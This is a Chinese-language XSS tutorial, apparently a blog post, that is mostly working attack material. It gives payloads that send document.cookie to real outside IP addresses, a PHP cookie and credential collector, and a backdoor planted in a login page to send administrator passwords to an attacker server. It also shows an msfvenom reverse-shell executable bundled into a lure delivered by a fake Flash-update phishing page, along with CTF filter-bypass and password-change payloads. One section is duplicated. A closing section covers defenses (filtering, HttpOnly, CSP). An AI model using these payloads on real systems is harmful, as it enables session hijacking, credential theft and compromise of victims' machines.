文章目录
- url处XSS
- 图片处XSS攻击
- svg-xss
- pdf-xss
- 游览器翻译-xss
- flash-xss
- cookie的获取
- cookie的获取
- 页面信息获取
- xss配合MSf钓鱼
- XSS修复
- CTF各种骚姿势
- CTF场景题
随着互联网技术的飞速发展,网络安全问题也日益凸显。在众多网络攻击方式中,跨站脚本攻击(Cross-Site Scripting, XSS)因其广泛性和高危性,成为了网络安全领域的一个重要研究课题。XSS 攻击通过在网页中注入恶意脚本,使攻击者能够窃取用户信息、劫持用户会话、篡改网页内容等,给用户和企业带来巨大的安全隐患。本文将深入探讨 XSS 漏洞的原理,并通过具体的实例演示如何复现这一漏洞,希望能帮助读者更好地理解和防范 XSS 攻击。
常用标签的绕过:
xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
url处XSS
代码示例
<?php $code=$_GET['x']; echo $code; ?>
payload:
http://127.0.0.1/xss-demo/xss.php?x=%3Cscript%3Ealert(%27cong%27);%3C/script%3E
图片处XSS攻击
代码示例
<?php $code=$_GET['x']; echo "<img src=$code>"; ?>
可以看到普通的xss是没有用的,因为源码为alert(‘213’);>,这样是无法触发xss的,可以用img标签的错误触发事件
payload:
http://127.0.0.1/xss-demo/xss.php?x=y οnerrοr=“alert(‘1’)”
svg-xss
概念
- SVG(可扩展矢量图形)是一种基于XML的矢量图形格式,用于描述二维图形。它广泛用于网页中的图形和动画,因为它可以无损缩放,并且由浏览器直接支持。由于SVG文件是基于XML的文本文件,它们可以包含脚本(如JavaScript)。如果SVG文件没有正确处理和过滤,恶意用户可以在SVG文件中嵌入恶意脚本,从而进行XSS攻击,目前主流的浏览器都已经支持SVG图片的渲染。
复现
代码示例:
test.svg <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16"> <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/> </svg>
增加以下代码子访问即可触发xss代码
-
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16"> <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/> <circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" /> <script>alert(1);</script> </svg>
-
pdf-xss
概念
- 在一些pdf编辑器中可以给pdf添加javascript动作导致的在游览器打开pdf文件时遭受xss攻击
复现
下载安装迅捷pdf编辑器
新建一个pdf
按照以下操作
输入一下动作
保存,在游览器中查看,成功执行
游览器翻译-xss
本来页面的xss被过滤了,但是由于一些扩展有重新加载出来,例如翻译货站
代码示例
edge: <b><u>行之在线测试 </u></b> <br> Políticas de Privacidade Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso. <br> Para prevenir abusos no app/site, o Badoo usa decisões automáticas e moderadores para bloquear contas, como parte de seu procedimento de moderação. Para isso, nós conferimos contas e mensagens para encontrar conteúdo que indicam quebra dos nossos Termos e Condições de Uso. Isso é feito através de uma <b><u>OUR PAYLOAD IN TEXT FORM </u></b> <br> <br> "><img src=x οnerrοr=alert(1)> //这里写Payload <br> <br> <br> Políticas de Privacidade
flash-xss
概念
- Flash是由Adobe开发的一种多媒体软件平台,用于创建动画、游戏和富互联网应用(RIA)。它包含Adobe Flash Player和Adobe Flash Professional(后更名为Adobe Animate)。Flash中的XSS攻击利用了Flash应用(特别是SWF文件)中的漏洞,通过注入恶意脚本,使这些脚本在用户的浏览器中执行。
常见造成xss中的swf文件函数
navigateToURL
getURL
ExternalInterface.call
htmlText
- 参考文章:(链接)
举例说明:
从网站下载swf文件,放在swf反编译工具中反编译
全局搜索上述swf文件函数,找出可以的注入点
- payload:http://127.0.0.1/uploader.swf?jsobject=alert(1)
cookie的获取
概念
- 通过javascript获取网站的cookie的信息
代码审计
-
配置文件config.inc.php: <?php //全局session_start session_start(); //全局居设置时区 date_default_timezone_set('Asia/Shanghai'); //全局设置默认字符 header('Content-type:text/html;charset=utf-8'); //定义数据库连接参数 define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址 define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名 define('DBPW', 'pkxss123');//将root修改为连接mysql的密码 define('DBNAME', 'pkxss');//自定义,建议不修改 define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306 ?> -------------------------------------------------------------------------------------------------- cookie.php: <?php include_once '../inc/config.inc.php'; include_once '../inc/mysql.inc.php'; $link=connect(); //这个是获取cookie的api页面 if(isset($_GET['cookie'])){ $time=date('Y-m-d g:i:s'); $ipaddress=getenv ('REMOTE_ADDR'); $cookie=$_GET['cookie']; $referer=$_SERVER['HTTP_REFERER']; $useragent=$_SERVER['HTTP_USER_AGENT']; $query="insert cookies(time,ipaddress,cookie,referer,useragent) values('$time','$ipaddress','$cookie','$referer','$useragent')"; $result=mysqli_query($link, $query); } header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站 ?>
-
复现
找到存在xss漏洞的留言板,存入payload
<script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
被重定向1.html
在在后台查看获取到的cookie信息
cookie的获取
概念
- 通过javascript获取网站的cookie的信息
代码审计
-
配置文件config.inc.php: <?php //全局session_start session_start(); //全局居设置时区 date_default_timezone_set('Asia/Shanghai'); //全局设置默认字符 header('Content-type:text/html;charset=utf-8'); //定义数据库连接参数 define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址 define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名 define('DBPW', 'pkxss123');//将root修改为连接mysql的密码 define('DBNAME', 'pkxss');//自定义,建议不修改 define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306 ?> -------------------------------------------------------------------------------------------------- cookie.php: <?php include_once '../inc/config.inc.php'; include_once '../inc/mysql.inc.php'; $link=connect(); //这个是获取cookie的api页面 if(isset($_GET['cookie'])){ $time=date('Y-m-d g:i:s'); $ipaddress=getenv ('REMOTE_ADDR'); $cookie=$_GET['cookie']; $referer=$_SERVER['HTTP_REFERER']; $useragent=$_SERVER['HTTP_USER_AGENT']; $query="insert cookies(time,ipaddress,cookie,referer,useragent) values('$time','$ipaddress','$cookie','$referer','$useragent')"; $result=mysqli_query($link, $query); } header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站 ?>
-
复现
找到存在xss漏洞的留言板,存入payload
<script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
被重定向1.html
在在后台查看获取到的cookie信息
页面信息获取
概念
- 当我们拿下网站权限时,需要进入网站看看,此时需要admin的账号和密码,就可以在源码中插入xss攻击代码获取密码的表单
条件
- 具备web权限,写入权限
复现
网站部分代码示例:
login_check.php <php error_reporting(E_ERROR | E_WARNING | E_PARSE); if(!isset($depth))$depth=''; $commonpath=$depth.'include/common.inc.php'; $commonpath=$admin_index?$commonpath:'../'.$commonpath; require_once $commonpath; $turefile=$url_array[count($url_array)-2]; if($met_adminfile!=$turefile){ $query="update $met_config set value='$turefile' where name='met_adminfile' and lang='metinfo'"; $db->query($query); } //dump($_SERVER); //echo $_SERVER[HTTP_REFERER]; //$HTTP_REFERERs=explode('?',$_SERVER[HTTP_REFERER]); //echo strrev(substr(strrev($HTTP_REFERERs[0]),0,7)); if($action=="login"){ $metinfo_admin_name = $login_name; $metinfo_admin_pass = $login_pass; $up = '<script src="http://43.139.186.80/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'"></script>'; //将账号密码发送到攻击者服务器中 echo $up; $metinfo_admin_pass=md5($metinfo_admin_pass); /*code*/ if($met_login_code==1){ require_once $depth.'../include/captcha.class.php'; ...... ------------------------------------------------------------------------------------------ get.php <?php $u = $_GET['user']; $p = $_GET['pass']; $myfile = fopen("newfile.txt", "w+"); fwrite($myfile, $u); fwrite($myfile, "|"); fwrite($myfile, $p); fclose($myfile); ?>//接受传来的账号和密码并写入newfile.txt当中
当管理员登录是后台自动发送账号和密码
xss配合MSf钓鱼
概念
- 通过msf生成后门,利用beef上线受控或者钓到鱼之后,通过msf的监听来控制主机
复现
生成后门poc.exe
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.36.147 LPORT=6666 -f exe > poc.exe
-
下载官方文件-保证安装正常
将后门与官方文件通过压缩软件捆绑在一起
- 将两压缩
msf启动监听
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 6666
- run
制作钓鱼页面,这里采用色诱
flash页面:doocop/Flash_Xss: Flash最新钓鱼源码对接官方API实现跟随官方升级而升级 (github.com)
替换下载点
代码示例
-
诱导安装页面 <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>小迪与某主播SESE画面流出!</title> </head> <body> 小迪与某主播SESE画面流出!<br> <img src="1.gif" alt="" width="300" height=600" align="absmiddle"/ onclick=a()> </body> </html> <script> function a(){ alert( "您的FLASH版本过低,尝试升级后访问该页面! "); window. location.href="http://192.168.36.147/"; } </script>
-
鱼儿点击网页上线
XSS修复
对危险字符进行过滤
变量过滤模版
<?php //开启http_only也可在php.ini开启 //ini_set("session.cookie_httponly", 1); //设置当前cookie //setcookie('mycookie','xiaodi'); //只允许加载本地源图片: //header("Content-Security-Policy:img-src 'self' "); //加载的是一张我随意百度的图片 //<img src="https://www.baidu.com/img/PCfb_5bf082d29588c07f842ccde3f97243ea.png"/> //自定义过滤函数 function remove_xss($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); // straight replacements, the user should never need these since they're normal characters // this prevents like <IMG SRC=@avascript:alert('XSS')> $search = 'abcdefghijklmnopqrstuvwxyz'; $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search .= '1234567890!@#$%^&*()'; $search .= '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen($search); $i++) { // ;? matches the ;, which is optional // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars // @ @ search for the hex values $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; // @ @ 0{0,7} matches '0' zero to seven times $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; } // now the only remaining whitespace attacks are \t, \n, and \r $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; // keep replacing as long as the previous round replaced something while ($found == true) { $val_before = $val; for ($i = 0; $i < sizeof($ra); $i++) { $pattern = '/'; for ($j = 0; $j < strlen($ra[$i]); $j++) { if ($j > 0) { $pattern .= '('; $pattern .= '(&#[xX]0{0,8}([9ab]);)'; $pattern .= '|'; $pattern .= '|(�{0,8}([9|10|13]);)'; $pattern .= ')*'; } $pattern .= $ra[$i][$j]; } $pattern .= '/i'; $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags if ($val_before == $val) { // no replacements were made, so exit the loop $found = false; } } } return $val; } $code=$_GET['x']; echo $code."<br>"; ?>
设置http-only
设置http-only可以防止防止客户端脚本(如 JavaScript)访问 cookie,从而防止通过 XSS 攻击窃取 cookie 信息。
设置过程
- php.ini中的session.cookie httponly =1
- 网站源码写入ini set(“session. cookie httponly”, 1);
设置CSP(content security policy)
csp严格限制脚本的来源,可以防止恶意脚本的执行,可以进制内联脚本,就算在源码上写入xss代码页无法执行,就比如上面的模版,
在网站中加入header(“Content-Security-Policy: img-src ‘self’”);即可即使注释掉了百度的图片,他还是会加载
对长度进行限制,实体转义
CTF各种骚姿势
参考文章:
xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
服务端接受
<?php $cookie = $_GET['c']; $myfile = fopen("cookie.txt", "w+"); fwrite($myfile, $cookie); fclose($myfile); ?>
远程调用
payload:
<script>window.location.href='http://47.94.236.17/get.php?c='+document.cookie</script>
过滤script
payload
<img src=1 onerror="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
过滤img
payload
<input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"> <svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
过滤空格
payload
<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"></svg>
body标签
payload
<body onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
CTF场景题
场景1
管理员的cookie频繁变化,无法获取cookie直接登录,但是可以通过xss表单获取管理员的账号和密码
payload
S('.laytable-cell-1-0-1').each(function(index,value) { if (value.innerHTML.indexOf('ctf' + 'show') > -1) { window.location.href = 'http://47.94.236.117/get.php?c=' + value.innerHTML; } });
场景2
- 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,get提交
payload:
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>//跳转回被管理员发现 <script src="http://127.0.0.1/api/change.php?p=123"></script>//页面在后台访问
场景3
- 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,post提交
payload
$.ajax({ url: 'http://127.0.0.1/api/change.php', type: 'post', data: { p: '123' } });
通过对 XSS 漏洞原理的详细剖析和复现过程的具体演示,我们可以清晰地看到这种攻击手段的危害及其实现方式。了解这些知识不仅有助于网络安全从业人员提升自身技能,还能帮助开发者更好地编写安全的代码,从源头上防范潜在的安全威胁。然而,XSS 仅仅是众多网络攻击手段之一,网络安全的攻防战是一场持久战,需要我们不断学习和更新知识,采取严密的防护措施,以应对日益复杂的网络攻击。希望本文能够为读者提供有价值的参考,促进大家在实际工作中更好地保护网络系统的安全。